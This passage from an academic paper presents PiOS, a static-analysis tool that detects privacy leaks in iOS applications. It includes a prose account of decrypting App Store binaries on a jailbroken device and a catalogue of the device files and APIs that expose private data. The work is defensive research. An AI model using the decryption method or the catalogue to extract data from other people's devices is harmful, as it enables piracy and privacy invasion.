Pios: Detecting Privacy Leaks in Ios Applications

Download as pdf or txt
Download as pdf or txt
You are on page 1of 15

PiOS: Detecting Privacy Leaks in iOS Applications

Manuel Egele

, Christopher Kruegel

, Engin Kirda

, and Giovanni Vigna

Vienna University of Technology, Austria


[email protected]

University of California, Santa Barbara


{maeg,chris,vigna}@cs.ucsb.edu

Institute Eurecom, Sophia Antipolis


[email protected]

Northeastern University, Boston


[email protected]
Abstract
With the introduction of Apples iOS and Googles An-
droid operating systems, the sales of smartphones have ex-
ploded. These smartphones have become powerful devices
that are basically miniature versions of personal comput-
ers. However, the growing popularity and sophistication of
smartphones have also increased concerns about the pri-
vacy of users who operate these devices. These concerns
have been exacerbated by the fact that it has become in-
creasingly easy for users to install and execute third-party
applications. To protect its users from malicious applica-
tions, Apple has introduced a vetting process. This vet-
ting process should ensure that all applications conform to
Apples (privacy) rules before they can be offered via the
App Store. Unfortunately, this vetting process is not well-
documented, and there have been cases where malicious
applications had to be removed from the App Store after
user complaints.
In this paper, we study the privacy threats that applica-
tions, written for Apples iOS, pose to users. To this end,
we present a novel approach and a tool, PiOS, that allow
us to analyze programs for possible leaks of sensitive in-
formation from a mobile device to third parties. PiOS uses
static analysis to detect data ows in Mach-0 binaries, com-
piled from Objective-C code. This is a challenging task due
to the way in which Objective-C method calls are imple-
mented. We have analyzed more than 1,400 iPhone appli-
cations. Our experiments show that, with the exception of a
few bad apples, most applications respect personal identi-
able information stored on users devices. This is even true
for applications that are hosted on an unofcial repository
(Cydia) and that only run on jailbroken phones. However,
we found that more than half of the applications surrepti-
tiously leak the unique ID of the device they are running on.
This allows third-parties to create detailed proles of users
application preferences and usage patterns.
1 Introduction
Mobile phones have rapidly evolved over the last years.
The latest generations of smartphones are basically minia-
ture versions of personal computers; they offer not only the
possibility to make phone calls and to send messages, but
they are a communication and entertainment platform for
users to surf the web, send emails, and play games. Mobile
phones are also ubiquitous, and allow anywhere, anytime
access to information. In the second quarter of 2010 alone,
more than 300 million devices were sold worldwide [13].
Given the wide range of applications for mobile phones
and their popularity, it is not surprising that these devices
store an increasing amount of sensitive information about
their users. For example, the address book contains infor-
mation about the people that a user interacts with. The GPS
receiver reveals the exact location of the device. Photos,
emails, and the browsing history can all contain private in-
formation.
Since the introduction of Apples iOS
1
and the Android
operating systems, smartphone sales have signicantly in-
creased. Moreover, the introduction of market places for
apps (such as Apples App Store) has provided a strong eco-
nomic driving force, and tens of thousands of applications
have been developed for iOS and Android. Of course, the
ability to run third-party code on a mobile device is a poten-
tial security risk. Thus, mechanisms are required to prop-
erly protect sensitive data against malicious applications.
Android has a well-dened mediation process that makes
the data needs and information accesses transparent to
1
Apple iOS, formally known as iPhone OS, is the operating system that
is running on Apples iPhone, iPod Touch, and iPad products.
users. With Apple iOS, the situation is different. In prin-
ciple, there are no technical mechanisms that limit the ac-
cess that an application has. Instead, users are protected by
Apples developer license agreement [3]. This document
denes the acceptable terms for access to sensitive data. An
important rule is that an application is prohibited fromtrans-
mitting any data unless the user expresses her explicit con-
sent. Moreover, an application can ask for permission only
when the data is directly required to implement a certain
functionality of the application. To enforce the restrictions
set out in the license agreement, Apple has introduced a vet-
ting process.
During the vetting process, Apple scrutinizes all applica-
tions submitted by third-party developers. If an application
is determined to be in compliance with the licencing agree-
ment, it is accepted, digitally signed, and made available
through the iTunes App Store. It is important to observe
that accessing the App Store is the only way for users with
unmodied iOS devices to install applications. This ensures
that only Apple-approved programs can run on iPhones (and
other Apple products). To be able to install and execute
other applications, it is necessary to jailbreak the device
and disable the check that ensures that only properly signed
programs can run.
Unfortunately, the exact details of the vetting process
are not known publicly. This makes it difcult to fully
trust third-party applications, and it raises doubts about the
proper protection of users data. Moreover, there are known
instances (e.g., [20]) in which a malicious application has
passed the vetting process, only to be removed from the
App Store later when Apple became aware of its offend-
ing behavior. For example, in 2009, when Apple realized
that the applications created by Storm8 harvested users
phone numbers and other personal information, all applica-
tions from this developer were removed from the App Store.
The goal of the work described in this paper is to au-
tomatically analyze iOS applications and to study the threat
they pose to user data. As a side effect, this also shines some
light on the (almost mysterious) vetting process, as we ob-
tain a better understanding of the kinds of information that
iOS applications access without asking the user. To analyze
iOS applications, we developed PiOS, an automated tool
that can identify possible privacy breaches.
PiOS uses static analysis to check applications for the
presence of code paths where an application rst accesses
sensitive information and subsequently transmits this infor-
mation over the network. Since no source code is avail-
able, PiOS has to perform its analysis directly on the bina-
ries. While static, binary analysis is already challenging,
the work is further complicated by the fact that most iOS
applications are developed in Objective-C.
Objective-C is a superset of the C programming lan-
guage that extends it with object-oriented features. Typi-
cal applications make heavy use of objects, and most func-
tion calls are actually object method invocations. Moreover,
these method invocations are all funneled through a single
dispatch (send message) routine. This makes it difcult to
obtain a meaningful programcontrol owgraph (CFG) for a
program. However, a CFG is the starting point required for
most other interesting program analysis. Thus, we had to
develop novel techniques to reconstruct meaningful CFGs
for iOS applications. Based on the control ow graphs,
we could then perform data ow analysis to identify ows
where sensitive data might be leaked without asking for user
permission.
Using PiOS, we analyzed 825 free applications available
on the iTunes App Store. Moreover, we also examined 582
applications offered through the Cydia repository. The Cy-
dia repository is similar to the App Store in that it offers a
collection of iOS applications. However, it is not associ-
ated with Apple, and hence, can only be used by jailbroken
devices. By checking applications both from the ofcial
Apple App Store and Cydia, we can examine whether the
risk of privacy leaks increases if unvetted applications are
installed.
The contributions of this paper are as follows:
We present a novel approach that is able to automati-
cally create comprehensive CFGs from binaries com-
piled from Objective-C code. We can then perform
reachability analysis on these CFGs to identify possi-
ble leaks of sensitive information from a mobile device
to third parties.
We describe the prototype implementation of our ap-
proach, PiOS, that is able to analyze large bodies of
iPhone applications, and automatically determines if
these applications leak out any private information.
To show the feasibility of our approach, we have ana-
lyzed more than 1,400 iPhone applications. Our results
demonstrate that a majority of applications leak the de-
vice ID. However, with a few notable exceptions, ap-
plications do respect personal identiable information.
This is even true for applications that are not vetted by
Apple.
2 System Overview
The goal of PiOS is to detect privacy leaks in applica-
tions written for iOS. This makes is necessary to rst con-
cretize our notion of a privacy leak. We dene as a privacy
leak any event in which an iOS application reads sensitive
data from the device and sends this data to a third party
without the users consent. To request the users consent,
the application displays a message (via the devices UI) that
species the data item that should be accessed. Moreover,
the user is given the choice of either granting or denying the
access. When an application does not ask for user permis-
sion, it is in direct violation of the iPhone developer pro-
gram license agreement [3], which mandates that no sensi-
tive data may be transmitted unless the user has expressed
her explicit consent.
The license agreement also states that an application may
ask for access permissions only when the proper function-
ality of the application depends on the availability of the
data. Unfortunately, this requirement makes it necessary to
understand the semantics of the application and its intended
use. Thus, in this paper, we do not consider privacy vio-
lations where the user is explicitly asked to grant access to
data, but this data is not essential to the programs function-
ality.
In a next step, we have to decide the types of informa-
tion that constitute sensitive user data. Turning to the Apple
license agreement is of little help. Unfortunately, the text
does neither precisely dene user data nor enumerate func-
tions that should be considered sensitive. Since the focus
of this work is to detect leaks in general, we take a loose
approach and consider a wide variety of data that can be
accessed through the iOS API as being potentially sensi-
tive. In particular, we used the open-source iOS application
Spyphone [17] as inspiration. The purpose of Spyphone is
to demonstrate that a signicant number of interesting data
elements (user and device information) is accessible to pro-
grams. Since this is exactly the type of information that we
are interested in tracking, we consider these data elements
as sensitive. A more detailed overview of sensitive data el-
ements is presented in Section 5.
Data ow analysis. The problem of nding privacy leaks
in applications can be framed as a data ow problem. That
is, we can nd privacy leaks by identifying data ows from
input functions that access sensitive data (called sources)
to functions that transmit this data to third parties (called
sinks). We also need to check that the user is not asked for
permission. Of course, it would be relatively easy to nd
the location of functions that interact with the user, for ex-
ample, by displaying a message box. However, it is more
challenging to automatically determine whether this inter-
action actually has the intent of warning the user about the
access to sensitive data. In our approach, we use the fol-
lowing heuristic: Whenever there is any user interaction
between the point where sensitive information is accessed
and the point where this information could be transferred to
a third party, we optimistically assume that the purpose of
this interaction is to properly warn the user.
As shown in Figure 1, PiOS performs three steps when
checking an iOS application for privacy leaks. First, PiOS
reconstructs the control ow graph (CFG) of the applica-
tion. The CFG is the underlying data structure (graph) that
is used to nd code paths from sensitive sources to sinks.
Normally, a CFG is relatively straightforward to extract,
even when only the binary code is available. Unfortunately,
the situation is different for iOS applications. This is be-
cause almost all iOS programs are developed in Objective-
C.
Objective-C programs typically make heavy use of ob-
jects. As a result, most function calls are actually invoca-
tions of instance methods. To make matters worse, these
method invocations are all performed through an indirect
call of a single dispatch function. Hence, we require novel
binary analysis techniques to resolve method invocations,
and to determine which piece of code is eventually invoked
by the dispatch routine. For this analysis, we rst attempt
to reconstruct the class hierarchy and inheritance relation-
ships between Objective-C classes. Then, we use backward
slicing to identify both the arguments and types of the input
parameters to the dispatch routine. This allows us to resolve
the actual target of function calls with good accuracy. Based
on this information, the control ow graph can be built.
In the second step, PiOS checks the CFGfor the presence
of paths that connect nodes accessing sensitive information
(sources) to nodes interacting with the network (sinks). For
this, the system performs a standard reachability analysis.
In the third and nal step, PiOS performs data ow anal-
ysis along the paths to verify whether sensitive informa-
tion is indeed owing from the source to the sink. This
requires some special handling for library functions that are
not present in the binary, especially those with a variable
number of arguments. After the data ow analysis has n-
ished, PiOS reports the source/sink pairs for which it could
conrm a data ow. These cases constitute privacy leaks.
Moreover, the system also outputs the remaining paths for
which no data ow was found. This information is useful
to be able to focus manual analysis on a few code paths for
which the static analysis might have missed an actual data
ow.
3 Background Information
The goal of this section is to provide the reader with the
relevant background information about iOS applications,
their Mach-O binary format, and the problems that com-
piled Objective-C code causes for static binary analysis.
The details of the PiOS system are then presented in later
sections.
3.1 Objective-C
Objective-C is a strict superset of the C programming
language that adds object-oriented features to the basic lan-
guage. Originally developed at NextStep, Apple and its line
Step 3: Data-Flow Analysis
Step 1: Reconstruct CFG &
Step 2: Reachability Analysis
0011001010
1010101101
1010101010
1001010101
0101010101
0101010101
Figure 1. The PiOS system.
of operating systems is now the driving force behind the
development of the Objective-C language.
The foundation for the object-oriented aspects in the lan-
guage is the notion of a class. Objective-C supports single
inheritance, where every class has a single superclass. The
class hierarchy is rooted at the NSObject class. This is the
most basic class. Similar to other object-oriented languages,
(static) class variables are shared between all instances of
the same class. Instance variables, on the other hand, are
specic to a single instance. The same holds for class and
instance methods.
Protocols and categories. In addition to the features
commonly found in object-oriented languages, Objective-
C also denes protocols and categories. Protocols resem-
ble interfaces, and they dene sets of optional or mandatory
methods. A class is said to adopt a protocol if it implements
at least all mandatory methods of the protocol. Protocols
themselves do not provide implementations.
Categories resemble aspects, and they are used to extend
the capabilities of existing classes by providing the imple-
mentations of additional methods. That is, a category al-
lows a developer to extend an existing class with additional
functionality, even without access to the source code of the
original class.
Message passing. The major difference between
Objective-C binaries and binaries compiled from other
programming languages (such as C or C++) is that, in
Objective-C, objects do not call methods of other objects
directly or through virtual method tables (vtables). Instead,
the interaction between objects is accomplished by sending
messages. The delivery of these messages is implemented
through a dynamic dispatch function in the Objective-C
runtime.
To send a message to a receiver object, a pointer to
the receiver, the name of the method (the so-called selec-
tor; a null-terminated string), and the necessary parameters
are passed to the objc_msgSend runtime function. This
function is responsible for dynamically resolving and invok-
ing the method that corresponds to the given selector. To
this end, the objc_msgSend function traverses the class
hierarchy, starting at the receiver object, trying to locate the
method that corresponds to the selector. This method can
be implemented in either the class itself, or in one of its
superclasses. Alternatively, the method can also be part of
a category that was previously applied to either the class,
or one of its superclasses. If no appropriate method can be
found, the runtime returns an object does not respond to
selector error.
Clearly, nding the proper method to invoke is a non-
trivial, dynamic process. This makes it challenging to re-
solve method calls statically. The process is further compli-
cated by the fact that calls are handled by a dispatch func-
tion.
3.2 Mach-O Binary File Format
iOS executables use the Mach-O binary le format,
similar to MacOS X. Since many applications for these
platforms are developed in Objective-C, the Mach-O for-
mat supports specic sections, organized in so-called com-
mands, to store additional meta-data about Objective-C pro-
grams. For example, the __objc_classlist section
contains a list of all classes for which there is an implemen-
tation in the binary. These are either classes that the devel-
oper has implemented or classes that the static linker has
included. The __objc_classref section, on the other
hand, contains references to all classes that are used by the
application. The implementations of these classes need not
be contained in the binary itself, but may be provided by the
runtime framework (the equivalent of dynamically-linked
libraries). It is the responsibility of the dynamic linker to
resolve the references in this section when loading the cor-
responding library. Further sections include information
about categories, selectors, or protocols used or referenced
by the application.
Apple has been developing the Objective-C runtime as
an open-source project. Thus, the specic memory layout of
the involved data structures can be found in the header les
of the Objective-C runtime. By traversing these structures
in the binary (according to the header les), one can recon-
struct basic information about the implemented classes. In
Section 4.1, we show how we can leverage this information
to build a class hierarchy of the analyzed application.
Signatures and encryption. In addition to specic sec-
tions that store Objective-C meta-data, the Mach-O le
format also supports cryptographic signatures and en-
crypted binaries. Cryptographic signatures are stored in
the LC_SIGNATURE_INFO command (part of a section).
Upon invoking a signed application, the operating systems
loader veries that the binary has not been modied. This is
done by recalculating the signature and matching it against
the information stored in the section. If the signatures do
not match, the application is terminated.
The LC_ENCYPTION_INFO command contains three
elds that indicate whether a binary is encrypted and
store the offset and the size of the encrypted content.
When the eld cryptid is set, this means that the pro-
gram is encrypted. In this case, the two remaining elds
(cryptoffset and cryptsize) identify the encrypted
region within the binary. When a program is encrypted, the
loader tries to retrieve the decryption key from the systems
secure key chain. If a key is found, the binary is loaded to
memory, and the encrypted region is replaced in memory
with an unencrypted version thereof. If no key is found, the
application cannot be executed.
3.3 iOS Applications
The mandatory way to install applications on iOS is
through Apples App Store. This store is typically accessed
via iTunes. Using iTunes, the requested application bundle
is downloaded and stored in a zip archive (with an .ipa
le extension). This bundle contains the application itself
(the binary), data les, such as images, audio tracks, or
databases, and meta-data related to the purchase.
All binaries that are available via the App Store are en-
crypted and digitally signed by Apple. When an applica-
tion is synchronized onto the mobile device (iPhone, iPad,
or iPod), iTunes extracts the application folder from the
archive (bundle) and stores it on the device. Furthermore,
the decryption key for the application is added to the de-
vices secure key chain. This is required because the appli-
cation binaries are also stored in encrypted form.
As PiOS requires access to the unencrypted binary code
for its analysis, we need to nd a way to obtain the de-
crypted version of a program. Unfortunately, it is not
straightforward to extract the applications decryption key
from the device (and the operating systems secure key
chain). Furthermore, to use these keys, one would also have
to implement the proper decryption routines. Thus, we use
an alternative method to obtain the decrypted binary code.
Decrypting iOS applications. Apple designed the
iPhone platform with the intent to control all software that
is executed on the devices. Thus, the design does not intend
to give full system (or root) access to a user. Moreover,
only signed binaries can be executed. In particular, the
loader will not execute a signed binary without a valid
signature from Apple. This ensures that only unmodied,
Apple-approved applications are executed on the device.
The rst step to obtain a decrypted version of an applica-
tion binary is to lift the restriction that only Apple-approved
software can be executed. To this end, one needs to jail-
break the device
2
. The term jailbreaking refers to a tech-
nique where a aw in the iOS operating system is exploited
to unlock the device, thereby obtaining system-level (root)
access. With such elevated privileges, it is possible to mod-
ify the system loader so that it accepts any signed binary,
even if the signature is not from Apple. That is, the loader
will accept any binary as being valid even if it is equipped
with a self-signed certicate. Note that jailbroken devices
still have access to the iTunes App Store and can download
and run Apple-approved applications.
One of the benets of jailbreaking is that the user ob-
tains immediate access to many development tools ready
to be installed on iOS, such as a debugger, a disassembler,
and even an SSH server. This makes the second step quite
straightforward: The application is launched in the debug-
ger, and a breakpoint is set to the program entry point. Once
this breakpoint triggers, we know that the system loader has
veried the signature and performed the decryption. Thus,
one can dump the memory region that contains the now de-
crypted code from the address space of the binary.
2
In July 2010 the Library of Congress which runs the US Copyright
Ofce found that jailbreaking an iPhone is fair use [8].
4 Extracting Control Flow Graphs from
Objective-C Binaries
Using the decrypted version of an application binary
as input, PiOS rst needs to extract the programs inter-
procedural control ow graph (CFG). Nodes in the CFG are
basic blocks. Two nodes connected through an edge indi-
cate a possible ow of control. Basic blocks are continuous
instructions with linear control ow. Thus, a basic block is
terminated by either a conditional branch, a jump, a call, or
the end of a function body.
Disassembly and initial CFG. In an initial step, we need
to disassemble the binary. For this, we chose IDA Pro,
arguably the most popular disassembler. IDA Pro already
has built-in support for the Mach-O binary format, and we
implemented our analysis components as plug-ins for the
IDA-python interface. Note that while IDA Pro supports
the Mach-O binary format, it provides only limited addi-
tional support to analyze Objective-C binaries: For exam-
ple, method names are prepended with the name of the
class that implements the method. Similarly, if load or
store instructions operate on instance variables, the mem-
ory references are annotated accordingly. Unfortunately,
IDA Pro does not resolve the actual targets of calls to the
objc_msgSend dispatch function. It only recognizes the
call to the dynamic dispatch function itself. Hence, the re-
sulting CFG is of limited value. The reason is that, to be
able to perform a meaningful analysis, it is mandatory to
understand which method in which class is invoked when-
ever a message is sent. That is, PiOS needs to resolve, for
every call to the objc_msgSend function, what method
in what class would be invoked by the dynamic dispatch
function during program execution.
Section 4.2 describes how PiOS is able to resolve the
targets of calls to the dispatch function. As this process
relies on the class hierarchy of a given application, we rst
discuss how this class hierarchy can be retrieved from an
applications binary.
4.1 Building a Class Hierarchy
To reconstruct the class hierarchy of a program, PiOS
parses the sections in the Mach-O le that store basic in-
formation about the structure of the classes implemented
by the binary. The code of Apples Objective-C runtime
is open source, and thus, the exact layout of the involved
structures can be retrieved from the corresponding header
les. This makes the parsing of the binaries easy.
To start the analysis, the __objc_classlist section
contains a list of all classes whose implementation is present
in the analyzed binary (that is, all classes implemented by
the developer or included by the static linker). For each of
these classes, we can extract its type and the type of its su-
perclass. Moreover, the entry for each class contains struc-
tures that provide additional information, such as the list
of implemented methods and the list of class and instance
variables. Similarly, the Mach-O binary format mandates
sections that describe protocols used in the application, and
categories with their implementation details.
In principle, the pointers to the superclasses would be
sufcient to recreate the class hierarchy. However, it is im-
portant for subsequent analysis steps to also have informa-
tion about the available methods for each class, as well as
the instance and class variables. This information is neces-
sary to answer questions such as does a class C, or any of
its superclasses, implement a given method M?
Obviously, not all classes and types used by an applica-
tion need to be implemented in the binary itself. That is,
additional code could be dynamically linked into an appli-
cations address space at runtime. Fortunately, as the iOS
SDK contains the header les describing the APIs (e.g.,
classes, methods, protocols, . . . ) accessible to iOS appli-
cations, PiOS can parse these header les and extend the
class hierarchy with the additional required information.
4.2 Resolving Method Calls
As mentioned previously, method calls in Objective-
C are performed through the dispatch function
objc_msgSend. This function takes a variable number
of arguments (it has a vararg prototype). However, the rst
argument always points to the object that receives the mes-
sage (that is, the called object), while the second argument
holds the selector, a pointer to the name of the method.
On the ARM architecture, currently the only architecture
supported by iOS, the rst two method parameters are
passed in the registers R0 and R1, respectively. Additional
parameters to the dispatch function, which represent the
actual parameters to the method that is invoked, are passed
via registers R2, R3, and the stack.
Listing 1 shows a snippet of Objective-C code that ini-
tializes a variable of type NSMutableString to the
string Hello. This snippet leads to two method invoca-
tions (messages). First, a string object is allocated, using the
alloc method of the NSMutableString class. Second,
this string object is initialized with the static string Hello.
This is done through the initWithString method.
The disassembly in Listing 2 shows that CPU register
R0 is initialized with a pointer to the NSMutableString
class. This is done by rst loading the (xed) address
off_31A0 (instruction: 0x266A) and then dereferencing
it (0x266E). Similarly, a pointer to the selector (alloc,
referenced by address off_3154) is loaded into register
R1. The addresses of the NSMutableString class and
the selector refer to elements in the __objc_classrefs
and __objc_selrefs sections, respectively. That is, the
dynamic linker will patch in the nal addresses at runtime.
However, since these addresses are xed (constant) values,
they can be directly resolved during static analysis and as-
sociated with the proper classes and methods. Once R0 and
R1 are set up, the BLX (branch with link exchange) instruc-
tion calls the objc_msgSend function in the Objective-C
runtime. The result of the alloc method (which is the ad-
dress of the newly-created string instance) is saved in regis-
ter R0.
In the next step, the initWithString method is
called. This time, the method is not calling a static class
function, but an instance method instead. Thus, the address
of the receiver of the message is not a static address. In con-
trast, it is the address that the previous alloc function has
returned, and that is already conveniently stored in the cor-
rect register (R0). The only thing that is left to do is to load
R1 with the proper selector (initWithString) and R2
with a pointer to the static string Hello (cfstr_Hello).
Again, the BLX instruction calls the objc_msgSend
function.
As the example shows, to analyze an Objective-C appli-
cation, it is necessary to resolve the contents of the involved
registers and memory locations when the dispatch function
is invoked. To this end, PiOS employs backward slicing to
calculate the contents of these registers at every call site to
the objc_msgSend function in an application binary. If
PiOS is able to determine the type of the receiver (R0) and
the value of the selector (R1), it annotates the call site with
the specic class and method that will be invoked when the
program is executed.
4.2.1 Backward Slicing
To determine the contents of registers R0 and R1 at a call
site to the objc_msgSend function, PiOS performs back-
ward slicing [19], starting from those registers. That is,
PiOS traverses the binary backwards, recording all instruc-
tions that inuence or dene the values in the target regis-
ters. Operands that are referenced in such instructions are
resolved recursively. The slicing algorithm terminates if it
reaches the start of the function or if all values can be deter-
mined statically (i.e., they are statically dened). A value is
statically dened if it is a constant operand of an instruction
or a static memory location (address).
In Listing 2, for example, the slice for the call to
objc_msgSend at address 0x2672 (the alloc call) stops
at 0x2668. At this point, the values for both R0 and R1
are statically dened (as the two offsets off_3154 and
off_31A0). The slice for the call site at 0x267c (the string
initialization) contains the instructions up to 0x2672. The
slicing algorithm terminates there because function calls
and message send operations store their return values in R0.
Thus, R0 is dened to be the result of the message send
operation at 0x2668.
Once the slice of instructions inuencing the values of
R0 and R1 is determined, PiOS performs forward constant
propagation. That is, constant values are propagated along
the slice according to the semantics of the instructions. For
example, MOV operations copy a value from one register
to another,
3
and LDR and STR instructions access memory
locations.
4.2.2 Tracking Type Information
PiOS does not track (the addresses of) individual instances
of classes allocated during runtime. Thus, the question in
the previous example is how to handle the return value of
the alloc function, which returns a dynamic (and hence,
unknown pointer) to a string object. Our key insight is that,
for our purposes, the actual address of the string object is
not important. Instead, it is only important to know that R0
points to an object of type NSMutableString. Thus, we
do not only propagate constants along a slice, but also type
information.
In our example, PiOS can determine the return type of
the alloc method call at address 0x2672 (the alloc
method always returns the same type as its receiver;
NSMutableString in this case). This type information
is then propagated along the slice. As a result, at address
0x267c, we have at our disposal the crucial information that
R0 contains an object of type NSMutableString.
To determine the types of function arguments and return
values, our system uses two sources of information. First,
for all external methods, the header les specify the precise
argument and return types. Unfortunately, there is no such
information for the methods implemented in the application
binary. More precisely, although the data structure that de-
scribes class and instance methods does contain a eld that
lists the parameter types, the stored information is limited
to basic types such as integer, Boolean, or character. All
object arguments are dened as a single type id and, hence,
cannot be distinguished easily.
Therefore, as a second source for type information,
PiOS attempts to resolve the precise types of all arguments
marked as id. To this end, the system examines, for each
method, all call sites that invoke this method. For the iden-
tied call sites, the system tries to resolve the parameter
types by performing the above-mentioned backward slicing
and constant propagation steps. Once a parameter type is
identied, the meta-data for the method can be updated ac-
cordingly. That is, we are building up a database as we learn
additional type information for method call arguments.
3
GCC seems to frequently implement such register transfers as SUB
Rd, Rs, #0, or ADD Rd, Rs, #0.
NSMutableString
*
v;
v = [[NSMutableString alloc] initWithString : @Hello]
Listing 1. Simple Objective-C expression
__text:00002668 30 49 LDR R1, =off_3154
__text:0000266A 31 48 LDR R0, =off_31A0
__text:0000266C 0C 68 LDR R4, [R1]
__text:0000266E 00 68 LDR R0, [R0]
__text:00002670 21 46 MOV R1, R4
__text:00002672 00 F0 32 E9 BLX _objc_msgSend ; NSMutableString alloc
__text:00002676 2F 49 LDR R1, =off_3190
__text:00002678 2F 4A LDR R2, =cfstr_Hello
__text:0000267A 09 68 LDR R1, [R1]
__text:0000267C 00 F0 2C E9 BLX _objc_msgSend
; NSMutableString initWithString:
Listing 2. Disassembly of Listing 1
Frequently, messages are sent to objects that are returned
as results of previous method calls. As with method input
arguments, precise return type information is only available
for functions whose prototypes are dened in header les.
However, on the ARM architecture, the return value of a
method is always returned in register R0. Thus, for methods
that have an implementation in the binary and whose return
type is not a basic type, PiOS can derive the return type by
determining the type of the value stored in R0 at the end of
the called methods body. For this, we again use backward
slicing and forward constant propagation. Starting with the
last instruction of the method whose return type should be
determined, PiOS calculates the slice that denes the type
of register R0 at this program location.
4.3 Generating the Control Flow Graph
Once PiOS has determined the type of R0 and the con-
tent of R1 at a given call site to objc_msgSend, the sys-
tem checks whether these values are reasonable. To this
end, PiOS veries that the class hierarchy contains a class
that matches the type of R0, and that this class, or any of
its superclasses or categories, really implements the method
whose name is stored as the selector in R1. Of course, stat-
ically determining the necessary values is not always possi-
ble. However, note that in cases where only the selector can
be determined, PiOS can still reason about the type of the
value in R0 if there is exactly one class in the application
that implements the selector in question.
When PiOS can resolve the target of a function call
through the dispatch routine, this information is leveraged
to build the control ow graph of the application. More pre-
cisely, when the target of a method call (the recipient of the
message) is known, and the implementation of this method
is present in the binary under analysis (and not in a dynamic
library), PiOS adds an edge from the call site to the target
method.
5 Finding Potential Privacy Leaks
The output of the process described in the previous sec-
tion is an inter-procedural control ow graph of the applica-
tion under analysis. Based on this graph, we perform reach-
ability analysis to detect privacy leaks. More precisely,
we check the graph for the presence of paths from sources
(functions that access sensitive data) to sinks (functions that
transmit data over the network). In the current implementa-
tion of PiOS, we limited the maximum path length to 100
basic blocks.
Interestingly, the way in which iOS implements and han-
dles user interactions implicitly disrupts control ow in the
CFG. More precisely, user interface events are reported to
the application by sending messages to delegate objects that
contain the code to react to these events. These messages
are not generated from code the developer wrote, and thus,
there is no corresponding edge in our CFG. As a result,
when there is a user interaction between the point where a
source is accessed, and data is transmitted via a sink, there
will never be a path in our CFG. Thus, all paths from sen-
sitive sources to sinks represent potential privacy leaks. Of
course, a path from a source to a sink does not necessar-
ily mean that there is an actual data ow. Hence, we per-
form additional data ow analysis along an interesting path
and attempt to conrm that sensitive information is actually
leaked.
5.1 Sources and Sinks
In this section, we discuss in more detail how we identify
sources of sensitive data and sinks that could leak this data.
Sources. Sources of sensitive information cover many as-
pects of the iOS environment. Table 1 enumerates the re-
sources that we consider sensitive. As mentioned previ-
ously, this list is based on [17], where Seriot presents a com-
prehensive list of potentially sensitive information that can
be accessed by iOS applications.
Access to the address book
Current GPS coordinates of the device
Unique Device ID
Photo Gallery
Email account information
WiFi connection information
Phone related information (Phone# , last called, etc.)
Youtube application (watched videos and recent search)
MobileSafari settings and history
Keyboard cache
Table 1. Sensitive information sources.
Any iOS application has full read and write access to
the address book stored on the device. Access is provided
through the ABAddressBook API. Thus, whenever an ap-
plication performs the initial ABAddressBookCreate
call, we mark this call instruction a source.
An application can only access current GPS coordi-
nates if the user has explicitly granted the application per-
mission to do so. This is enforced by the API, which
displays a dialog to the user the rst time an applica-
tion attempts to access the CoreLocation functional-
ity. If access is granted, the application can install a del-
egate with the CoreLocation framework that is noti-
ed whenever the location is updated by the system. More
precisely, the CoreLocation framework will invoke
the locationManager:didUpdateToLocation:
fromLocation method of the object that is passed to the
CLLocationManager:setDelegate method when-
ever the location is updated.
A unique identier for the iOS device executing the
application is available to all applications through the
UIDevice uniqueIdentifier method. This ID is
represented as a string of 40 hexadecimal characters that
uniquely identies the device.
The keyboard cache is a local le accessible to all appli-
cations. This le contains all words that have been typed
on the device. The only exception are characters typed into
text elds marked to contain passwords.
Furthermore, there exist various property les that pro-
vide access to different pieces of sensitive information. The
commcenter property le contains SIM card serial num-
bers and IMSI identiers. The users phone number can
be accessed by querying the standardUserDefaults
properties. Email account settings are accessible through
the accountsettings properties le. Similar les ex-
ist that contain the history of the Youtube and MobileSafari
applications, as well as recent search terms used in these
applications. The wifi properties le contains the name of
wireless networks the device was connected to. Also, a time
stamp is stored, and the last time when each connection was
active is logged. Accesses related to these properties are all
considered sensitive sources by PiOS.
Sinks. We consider sinks as operations that can transmit
information over the network, in particular, methods of the
NSURLConnection class. However, there are also meth-
ods in other classes that might result in network requests,
and hence, could be used to leak data. For example, the
method initWithContentsOfURL of the NSString
class accepts a URL as parameter, fetches the content at
that URL, and initializes the string object with this data.
To nd functions that could leak information, we carefully
went through the API documentation. In total, we included
14 sinks.
5.2 Dataow Analysis
Reachability analysis can only determine that there ex-
ists a path in the CFG that connects a source of sensitive
information to a sink that performs networking operations.
However, these two operations might be unrelated. Thus,
to enhance the precision of PiOS, we perform an additional
data ow analysis on the paths that the reachability analysis
reports. That is, for every path that connects a source and a
sink in the CFG, we track the propagation of the informa-
tion accessed at the source node. If this data reaches one or
more method parameters at the sink node, we can conrm a
leak of sensitive information, and an alert is raised.
We use a standard data ow analysis that uses forward
propagation along the instructions in each path that we have
identied. For methods whose implementation (body) is
not available in the binary (e.g., external methods such as
initWithString of the NSMutableString class),
we conservatively assume that the return value of this func-
tion is tainted when one or more one of the arguments is
tainted.
Methods with variable number of arguments. To de-
termine whether the output of an external function should
be tainted, we need to inspect all input arguments.
This makes functions with a variable number of argu-
ments a little more tricky to handle. The two ma-
jor types of such functions are string manipulation func-
tions that use a format string (e.g., NSMutableString
appendStringWithFormat), and initialization func-
tions for aggregate types that fetch the objects to be placed
in the aggregate from the stack (e.g., NSDictionary
initWithObjects:andKeys). Ignoring these func-
tions is not a good option especially because string manip-
ulation routines are frequently used for processing sensitive
data.
For string methods that use format strings, PiOS attempts
to determine the concrete value (content) of the format
string. If the value can be resolved statically, the number of
arguments for this call is determined by counting the num-
ber of formatting characters. Hence, PiOS can, during the
data ow analysis, taint the output of such a function if any
of its arguments is tainted.
The initialization functions fetch the contents for the ag-
gregate from the stack until the value NULL is encountered.
Thus, PiOS iteratively tries to statically resolve the values
on the stack. If a value statically resolves to NULL, the
number of arguments for this call can be determined. How-
ever, since it is not guaranteed that the NULL value can be
determined statically, we set the upper bound for the num-
ber of parameters to 20.
6 Evaluation
We evaluated PiOS on a body of 1,407 applications. 825
are free applications that we obtained from Apples iTunes
store. We downloaded the remaining 582 applications from
the popular BigBoss [1] repository which is installed by
default with Cydia [12] during jailbreaking. Applications
originating from the Cydia repositories are not encrypted.
Therefore, these applications can be directly analyzed by
PiOS. Applications purchased from the iTunes store, how-
ever, need to be decrypted before any binary analysis can
be started. Thus, we automated the decryption approach
described in Section 3.3.
Since iTunes does not support direct searches for free ap-
plications, we rely on apptrakr.com [2] to provide a contin-
uously updated list of popular, free iOS applications. Once
a new application is added to their listings, our system au-
tomatically downloads the application via iTunes and de-
crypts it. Subsequently, the application is analyzed with
PiOS.
6.1 Resolving Calls to objc msgSend
